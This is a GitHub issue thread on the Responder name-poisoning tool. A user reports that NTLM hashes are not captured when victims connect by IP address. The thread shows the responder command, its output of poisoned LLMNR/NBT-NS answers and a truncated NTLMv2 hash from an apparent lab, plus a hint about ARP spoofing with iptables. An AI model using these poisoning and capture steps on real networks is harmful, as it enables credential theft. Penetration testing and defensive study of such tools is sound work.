lgandx / Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
GNU General Public License v3.0

Does not work when the victim uses the IP address to access shared folders #280

Closed MiMaz7707 closed 2 months ago

MiMaz7707 commented 3 months ago

Hello,

It works fine if the victim uses the hostname in the UNC path, but it doesn't if the victim uses the server IP address or the FQDN.

```
responder -I eth0 -dwv

       NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.117.200]
    Responder IPv6             [fe80::9024:b852:9137:c6f]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-OE0U3JW4FXX]
    Responder Domain Name      [WYT3.LOCAL]
    Responder DCE-RPC Port     [46345]

[+] Listening for events...

[*] [LLMNR]  Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[*] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[*] [LLMNR]  Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR]  Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR]  Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client   : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash     : test::MYLAB:d2f4d55a1d326bac...
```

lgandx commented 3 months ago

Who said it should?

If you want to catch those, you'll need to ARP with prerouting iptables rules.

Disruption will therefore occur.


danbinns-ss commented 2 months ago

LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.

MiMaz7707 commented 2 months ago

Hello,

I get it, so it needs a MitM attack to get a response from victims that use an IP address.

Thanks.